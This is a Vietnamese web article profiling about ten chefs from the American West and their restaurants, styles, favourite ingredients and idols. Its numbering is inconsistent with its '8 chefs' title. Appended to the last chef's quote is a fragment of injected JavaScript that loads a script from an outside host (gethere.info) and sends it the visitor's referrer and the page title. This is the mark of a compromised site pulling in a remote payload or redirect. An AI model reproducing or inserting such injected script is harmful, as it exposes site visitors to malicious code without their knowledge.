8 Đầu bếp thú vị nhất miền Tây nước Mỹ

Miền Tây nước Mĩ là mảnh đất ra đời nhiều con người với cá tính mạnh mẽ, nổi loạn và luôn sẵn sàng phá bỏ mọi luật lệ gò bó thông thường. Chính vì vậy, không có gì là ngạc nhiên khi thế hệ những đầu bếp trẻ hiện nay của Tây Mĩ đang đẩy giới hạn của ẩm thực thông thường với những câu hỏi quen thuộc: món ăn đó gồm những gì?, cách chế biến thế nào? và bạn nên gọi nó là gì trên Instagram?, lên 1 tầm cao mới.

 8 đầu bếp thú vị nhất miền Tây nước Mĩ1

  1. Eric Sakai – Nhà hàng Marron, Seatlle, WA

Eric đã hướng nền tảng nấu ăn rất tốt của mình theo phong cách Mĩ hiện đại, tinh tế, thanh lịch, mà vẫn vô cùng thơm ngon. Phong cách này thể hiện đặc trưng của con người anh – sự hòa hợp của những gì tinh túy kế thừa từ Nhật Bản, Hawaii – mảnh đất nơi anh lớn lên và nguồn gốc Tây bắc Thái Bình Dương.

Phong cách nấu ăn: “Hi vọng làm nên vị thơm ngon”.

Nếu không trở thành đầu bếp, anh sẽ là: “Tôi từng có ước mơ là sẽ sở hữu tất cả các cửa hàng Cabela và gia đình chúng tôi sẽ có mọi thứ chúng tôi cần để sống”.

Gia vị yêu thích: “Vị chua, dù đó là cam chanh, giấm hay bất cứ thứ gì khác. Tiêu cũng là 1 gia vị mà tôi đánh giá rất cao. Muối và các gia vị chua với tôi, đó là vũ khí bí mật của 1 đầu bếp”.

Đầu bếp thần tượng: “Chú chuột Remy trong bộ phim về nấu ăn Ratatoullie là thần tượng của tôi bởi tài năng vượt trội không ai có thể sánh bằng với những món ăn độc đáo tuyệt vời. Mọi người xung quanh luôn cố gắng kéo Remy xuống nhưng cuối cùng, bằng tài năng của mình, chú đã vươn lên đến đỉnh cao”.

 8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Jered Couch – Nhà hàng The Dish, Boise , ID

Jered đã đi tiên phong trong việc đưa hương vị dân tộc vào các món ăn quen thuộc (các món chiên với bánh mì, đùi gà nướng men espresso)

Phong cách nâú ăn: “Ẩm thực quen thuộc trên thế giới”

Nếu không là đầu bếp anh sẽ trở thành: “Tôi đã theo học 1 khóa học quản lí xây dựng tại bang Boise trước khi tôi tới trường học nấu ăn, vì vậy nếu không là đầu bếp có lẽ tôi sẽ làm trong ngành xây dựng.Nó cũng có nhiều nét tương tự như nấu ăn. Công việc chân tay thực sự rất vất vả nhưng nó cũng có những khía cạnh đòi hỏi sự sáng tạo riêng.”

Nguyên liệu yêu thích: “Hải sản Thái Bình Dương như hàu ở đảo Stretch và trai ở vũng Penn. Nấm mosela, nấm mồng gà và các loại nấm dại khác ở Oregon và Idaho”.

Đầu bếp thần tượng: “Vern Bauer là thầy dạy của tôi khi tôi làm việc ở Thomas Cuisine Management. Ông là 1 chuyên gia về tổ chức, đa nhiệm và sáng tạo trong nấu ăn”.

8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Laura Cole – 229 Parks Restaurant & Tavern, vườn quốc gia Denali, AK

Laura tuyên bố sẽ đưa những nguyên liệu tuyệt vời nhất của Alaska tới vườn quốc gia và tạo dựng 1 cộng đồng khách hàng quan tâm tới nhà hàng của cô bằng cách tổ chức các chương trình nghệ thuật tại địa phương, các lớp dạy nấu ăn, tranh thủ nguyên liệu mang theo từ những người hàng xóm khi họ tới Anchorage. Laura cũng tận dụng mọi thứ từ tuần lộc mua ở các trang trại nhỏ tới bột lúa mạch – loại hạt duy nhất có thể được trồng ở Alaska.

Phong cách nấu ăn: “Hương vị Alaska, đặc trưng theo mùa và đơn giản, không cầu kì”

Nếu không là đầu bếp cô sẽ trở thành: “1 người hoạt động xã hội”.

Nguyên liệu ưa thích: “Thịt lợn, tất cả các phần. Tôi thích làm xúc xích, dạ dày, nước xương…”

Đầu bếp thần tượng: “Alice Waters đã trở thành 1 biểu tượng, người tiên phong trong những thay đổi độc đáo trong ẩm thực với những đóng góp cho quy trình từ nông trại tới bàn ăn và cho cộng đồng. Đọc những cuốn sách của Ruth Reichl giúp tôi có động lực để cố gắng phấn đấu, khẳng định mình, tìm được vị trí riêng trong làng ẩm thực hiện nay”.

8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Josh Hebert – POSH, Scottsdale, AZ

Ăn tối tại POSH cũng giống như đọc 1 cuốn tiểu thuyết mà bạn có thể tự chọn cho mình những cuộc phiêu lưu trong đó. Sự ứng tác xuất thần của Josh trong phong cách chế biến giúp khách hàng có thể thỏa mái lựa chọn nguyên liệu hay thành phần mà họ thích hay không thích trong 1 thực đơn kiểu sushi. Dựa vào những yêu cầu của bạn Josh sẽ đưa ra 1 thực đơn miễn chê sau đó.

Phong cách nấu ăn: “Tôi có đang mơ mộng không?”

Nguyên liệu yêu thích: “Nguyên liệu yêu thích của tôi là trứng. Đó là 1 loại nguyên liệu quen thuộc với tất cả chúng ta. Tuy vậy nhiều người không biết rằng trứng sạch nhưng cũng chứa rất nhiều chất và nhạy cảm với nhiệt độ. Muốn hiểu được loại nguyên liệu này thực sự cần thực hành và quan sát rất nhiều để nắm được đặc tính của nó.Với tôi trứng là 1 nguyên liệu đem lại rất nhiều điều ngạc nhiên, 1 nguyên liệu có thể biến hóa rất linh hoạt trong nấu nướng. Tôi thường làm bánh phô mai với trứng thay vì dùng bơ. Vấn đề chỉ là bạn có đủ khả năng để hướng nó theo ý mình hay không mà thôi”.

Đầu bếp thần tượng: “Thật khó lựa chọn giữa Eric Ripert của Le Bernardin và David Kinch của Manresa.Ở họ toát lên sự chuyên nghiệp, khả năng truyền cảm hứng và trên hết cả hai đều là những bậc thầy khi vào bếp”.

 8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Beau Schooler – The Rookery Café, Juneau, AK

“ Đế chế” ẩm thực của Schooler đã thay đổi cách ăn uống của người dân Alaska. Quán cà phê khiêm tốn của anh, the Rookery Café mang phong cách sáng tạo với những món ăn độc đáo như tuần lộc nướng với anh đào hun khói và bibimbap rau củ. Schooler mang hương vị Mexico đặc trưng tới Juneau và của hàng bán các món đặc sản của anh, Panhandle Provisions cũng bán cả các món đồ thủ công rấy độc đáo. Schooler đang chuẩn  bị mở thêm 1 nhà hàng Ý.

Phong cách nấu ăn: “Hương vị Alaska hòa quyện cùng thế giới”

Nếu không trở thành đầu bếp anh ấy sẽ: “Có thể tôi đang ở trong tù”

Nguyên liệu yêu thích: “Thịt lợn có thể sử dụng rất linh hoạt. Chúng tôi thường chọn mua lợn ở các trang trại Alaska và tôi rất thích thú với việc tính toán xem tôi có thể làm được bao nhiêu món ăn khác nhau”.

Đầu bếp thần tượng: “Jacques Pepin. Chương trình  truyền hình PBS của ông đã có ảnh hưởng rất lớn tới tôi khi tôi còn nhỏ. Tôi thậm chí lúc ấy không biết rằng tôi muốn trở thành 1 đầu bếp. Thực sự tôi chỉ đơn giản là thích xem chương trình đấy mà thôi”.

 8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Matt Masera – Mother,Sacramento, CA

Ở độ tuổi 20 còn rất trẻ, Masera  cùng với bạn của mình, đầu bếp Michael Thieman đã có những sáng tạo độc đáo và vô cùng ấn tượng trong việc chế biến rau củ với những công thức cho các món ăn không có vị ngọt như burger cà rốt đậu phộng, hay nhiều món ngọt như bánh củ cải đường( lấy cảm hứng từ công thức bánh red velvet thơm ngon của mẹ anh) cũng như nhiều gia vị đầy tính sáng tạo khác ( mù tạt cây thùa, mayo cà phê…).

Phong cách nấu ăn: “Thông minh và điềm tĩnh”

Nếu không trở thành đầu bếp anh sẽ là: “Có lẽ là nhà thơ”.

Nguyên liệu yêu thích: “Rau mùi là 1 gia vị rất thú vị, linh hoạt trong nhiều loại món ăn. Tôi thường xuyên cho nó vào hầu hết các món khi chế biến.”

Đầu bếp thần tượng: “Cách nấu nướng, phong cách và sự tự tin của Sam Mason thực sự gây ấn tượng mạnh với 1 đầu bếp trẻ như tôi. Những món ăn của anh ấy có khả năng truyền cảm hứng lớn. Anh ấy đã cố gắng tạo nên những đột phá ở vỏ bánh ngọt và xóa nhòa đi ranh giới giữa những món ngọt và các món không có vị ngọt truyền thống. Hiện nay anh ấy có 1 công ty sản xuất nước xốt mayonne và 1 tiệm kem lớn. Ai mà lại không muốn làm bạn với 1 con người như thế cơ chứ?”.

 8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Ian Wilson – Fenrir, Portland, OR

Wilson thường nấu các món ăn tây bắc Thái Bình Dương theo hương vị Sandinavan và đặc biệt là có thêm vị đắng.

Phong cách nấu ăn: “Phân tích, khám phá, đầu tư”.

Nếu như không trở thành đầu bếp anh ấy sẽ là: “Khi tôi không còn theo nghề đầu bếp nữa tôi sẽ trở thành 1 người thợ mộc và tôi đang trông chờ ngày đó.”

Nguyên liệu yêu thích: “Có thể hầu như mọi người không sử dụng nó nhưng tôi thích việc chế biến các bộ phận có hương vị của các loài cây như hạt cây còn non và hoa”

Đầu bếp thần tượng: “Tôi luôn được truyền cảm hứng mạnh mẽ từ những đầu bếp cống hiến hết mình cho nghệ thuật ẩm thực, sự tinh nhạy và trực giác với nghề làm nên thành công của họ”.

  8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Jay Blackinton – Hogstone Wood Oven, đảo Orcas, WA

Blackinton đã đưa quy trình từ nông trại đến bàn ăn lên 1 tầm cao mới. Anh tự nuôi gia súc, chăm sóc vườn tược, hầu hết các nguyên liệu anh chọn đều chỉ riêng có ở trên đảo Orcas mà thôi. Bạn có thể thấy đuược điều này khi thưởng thức hương vị ngon tuyệt của siêu thực đơn theo mùa với giá chỉ 75$.

Phong cách nấu ăn:Ẩm thực đến từ đất đai Tây Bắc”.

Nếu như không trở thành đầu bếp anh sẽ là: “Tôi bắt đầu mở nhà hàng này như là đầu ra cho những gì tôi sản xuất được ở trang trại của mình và tất cả những gì đáng yêu tôi tìm thấy trên hòn đảo này. Trước tiên tôi là 1 người nông dân vì vậy tôi sẽ quay trở lại với công việc ở nông trại của mình khi không còn là đầu bếp nữa”.

Nguyên liệu yêu thích: “Đây là 1 câu hỏi rất khó trả lời. Bạn thấy đấy, quanh ta không có gì là tồn tại vĩnh viễn, chúng ta có thêm hương vị yêu thích mới mỗi tuần. Vào thời điểm này là bí xanh, tuần tới sẽ là dưa hấu hay mận. Vật duy nhất bất biến đó là mặt trời. Vậy mặt trời có thể là nguyên liệu ưa thích của tôi được không? Hay là đất nhỉ?”

Đầu bếp thần tượng: “Tôi tự học nấu ăn từ sách vở, những lần thử nghiệm và mắc lỗi. Tôi rất ấn tượng với các đầu bếp như David Kinch, Michel Bras, Alain Passard và Andoni Luis Aduriz. Ngoài ra còn có 1 người phụ nữ làm bánh burger ở cửa hàng ăn trên phố mà tôi cũng rất yêu mến”.

 8 Đầu bếp thú vị nhất miền Tây nước Mĩ

  1. Johanna Ware – Smallwares, Portland, OR

Không muốn lặp lại bản sao của những hương vị Á Đông, Ware đã táo bạo kết hợp chúng với những nguyên liệu của Tây Bắc Thái Bình Dương thong qua nhiều cách vô cùng thú vị và sáng tạo ( bạn có tưởng tượng ra rau cải xoăn chiên với thịt lợn hun khói tẩm mật…).Thêm vào đó thực đơn cocktail với điểm nhấn là sake cũng là 1 sự bổ sung hoàn hảo cho các món ăn của Ware.

Phong cách nấu ăn: “Shock, thú vị và cân bằng”.

Nếu không trở thành đầu bếp cô ấy sẽ là: “Jane Goodall tiếp theo”.

Gia vị yêu thích: “Tôi thích gia vị đa năng yuzu của Nhật. Nó có vị cay, mặn và cả chua – tất cả mọi hương vị mà tôi yêu thích”.

Đầu bếp thần tượng: “Tôi thực sự thích Roy Choi. Anh ấy rất quan tâm và đề cao nguồn cội của mình, anh ấy đã hướng về và cống hiến nhiều cho cộng đồng…điều mà tôi luôn muốn học hỏi”.

8 Đầu bếp thú vị nhất miền Tây nước Mĩ

10. Will Preisch and Joel Stocks – Holdfast Dining, Portland, OR

Các món ăn của Preisch và Stocks rất thông minh, làm nổi bật hương vị hải sản địa phương và đưa mọi người đến với sự thơm ngon của các loài thực vật biển.

Phong cách nấu ăn: “Điềm tĩnh, tinh tế và mang hơi thở từng mùa” – Joel

“Sạch, hiện đại, sâu sắc” – Wills

Nếu không trở thành đầu bếp anh sẽ là:

“Tôi luôn thấy công việc pha chế rất thú vị. Tôi cũng thực sự giỏi về việc làm túi đựng thực phẩm và đã từng đùa rằng sẽ quả là tuyệt nếu được làm 1 công việc vô lo vô nghĩ như vậy”. – Joel

“ Tôi sẽ nối tiếp bố tôi làm chủ nhà hàng”. – Wills

Nguyên liệu ưa thích:“Các loại rau ven biển không hề dễ sử dụng, nếu bạn muốn cho chúng vào thực đơn bạn cần phải tìm tòi những đặc tính của chúng”.

Đầu bếp thần tượng: “Thomas Keller là thần tượng của tôi từ khi tôi còn nhỏ, khoảng thời gian ngắn ngủi ở căn bếp của ông là 1 trong những kí ức tuyệt nhất của tôi”. – Joel. “David Kinch. Các món ăn của ông vô cùng tuyệt vời. Chúng trông đơn giản nhưng lại chứa đựng rất nhiều sự chính xác và tỉ mỉ trong từng yếu tố. Tôi thấy rất ngưỡng mộ khi dù thành công như vậy, ông cũng không mở rộng công việc kinh doanh nhiều mà chuyên tâm vào phát triển những gì đã có”. – Willss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;